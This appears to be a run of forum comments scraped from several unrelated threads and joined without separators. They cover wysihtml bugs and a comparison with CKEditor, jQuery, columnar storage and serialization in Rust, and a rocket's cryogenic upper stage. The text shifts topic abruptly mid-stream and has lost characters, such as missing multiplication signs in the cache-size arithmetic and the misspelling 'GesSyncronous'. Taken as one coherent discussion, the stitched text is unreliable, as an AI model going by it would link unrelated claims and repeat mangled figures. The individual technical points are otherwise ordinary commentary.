# Clicking the "no-color" option in the text color-picker doesn't do anything.
# Using the "remove" option on a link inserts a space as well as removing the link, which seems incorrect.
# Using the "remove" option on a link doesn't always remove the entire link. Repro on http://wysihtml.com/ by selecting the word "typewriter", adding a link, then clicking on it again and removing the link. Depending on where you clicked either "type" or "writer" will still be linked.
# Repeatedly toggling tags can get weird. e.g. select a word and keep on clicking the bold/italic/underline button, and note how it'll toggle the tag on, toggle it off, and then just start adding spaces in front of it with every subsequent click.
# Possibly related to the spaces issue, after toggling tags for a bit checking the source generated shows a lot of empty-tags, which is kind of messy.
Author plans to update it to use wysihtml as a drop-in replacement.
CKEditor has had the ACF (Advanced Content Filter) for >1.5 years now. It allows you to very tightly control which tags and attributes are allowed.
This feature, and the rest of CKEditor has much, much more test coverage to account for the many browser quirks (notably in contentEditable) that they have had to work around, to prevent regressions.It's a waste of time for everybody to solve the same problems and work around the same browser quirks over and over again.
The "Ability to add uneditable area inside editor text flow (useful when building modules like video tools, advanced image editor etc)." feature is probably the only interesting feature. But it's nothing compared to CKEditor Widgets, which does exactly this, and much more (think storing structured content but transforming it to the specific markup that a frontend developer wants).Just compare Wysihtml's "advanced" demo to the CKEditor Widgets demo: http://docs.ckeditor.com/#!/guide/dev_widgets
See http://docs.ckeditor.com/#!/guide/dev_advanced_content_filte... for more about ACF and http://docs.ckeditor.com/#!/guide/dev_widgets for more about Widgets.
And yes, it's open source: GPL/LGPL/MPL/commercial: http://ckeditor.com/about/license
If we'd collaborate more rather than reinventing the wheel, we'd get so much further. One does not just write a WYSIWYG editor
Try out their beautiful working app: http://voog.com
but why no jquery?
As someone who ported a embedded website away from jquery, it was painful, and I've come to really appreciate it
Well, that sums that up pretty succinctly. :)
> "... columnarization, a technique from the database community for laying out structured records in a format that is more convenient for serialization than the records themselves."
Column stores in comparison to row stores don't offer any serialization benefit per se. The main benefits are the following, I will be using a record (A,B,C,D,E) as example with all types u32 (4 bytes):
* If you only use some fields you have to load less data from memory/disk into the CPU cache and your working set is more probable to fit into cache. For example when filtering only the records where A=22 and B=45 you only have to actually load x(sizeof(A)+sizeof(B)) = x8 bytes instead of xrecord_size=x20. This can make a very significant difference.* When using compression to reduce the size of data, columns can often be compressed better because they only contain data of the same type and nature and thus probably share similarities. When using such a small record consisting only of integers it probably won't make a difference. But if e.g. some fields are country abbreviations, textual description or others are ids, one could easily imagine that there are gains.
Coming back to the point about serialization, using the same technique as described in the blog post, there won't be a performance difference between column storage and row storage (e.g. using a struct). The method described in the blog post just lets the data array of the original vector be wrapped by a Vec<u8> without even moving the memory, so the method is independent of the data type that is stored in the vectors. Of course it will only work for data types that do not contains references, otherwise we could get illegal memory access after deserialization (which should be guaranteed by the rust type system because only Copy types are allowed).
The only thing this benchmark is testing is how fast a vector can be initialized.
 There can be an space improvement of keeping the data in a column layout compared to row layout when using normal structs. Normal structs normally align the total size to the size of the largest field in the struct. A struct containing i64 and i8 would contain 7 bytes of padding. In a column layout this overhead would be avoided. Still there would not be an improvement in this serialization scheme as it does not actually copy any data.
Instead of (uint, int) we could have (int, sint) or (uint, sint).
Next step is to get the Cryogenic Upper stage to actually provide the critical thrust that will finally power it into a GesSyncronous orbit. On this mission it was bolted on but passive.